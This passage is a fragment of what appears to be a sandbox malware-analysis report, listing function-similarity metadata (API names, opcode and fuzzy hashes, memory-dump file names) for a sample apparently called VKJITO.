                                          Similarity
                                          • API ID: Heap$AllocFreeProcessmemmove
                                          • String ID:
                                          • API String ID: 4130131589-0
                                          • Opcode ID: 0e42a8202201087e01eaf85ebe8829510cdf0d17d06ea794ff4686d98fb70351
                                          • Instruction ID: e92caf6e2185e9849a1dc5b6f8f8099e889782c0862151859d926b91c26f9ede
                                          • Opcode Fuzzy Hash: 0e42a8202201087e01eaf85ebe8829510cdf0d17d06ea794ff4686d98fb70351
                                          • Instruction Fuzzy Hash: 6311EB6AB4EB61A0FA09EF537D41179A6906F4AFD0B884875CD1D077A0DE3CD4D3A220
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: fce2947c762ae9bbca19df9e202608d972a39c9eec8d7f1758a77f83600d9c2e
                                          • Instruction ID: 5815fc725671cddbc80825263078f935cfd310370eeff23b7f9f3539702eda8a
                                          • Opcode Fuzzy Hash: fce2947c762ae9bbca19df9e202608d972a39c9eec8d7f1758a77f83600d9c2e
                                          • Instruction Fuzzy Hash: B511232BA08F0489F710AB65D84537C7770F786B54F404A61DE2E133E4CF38C881D210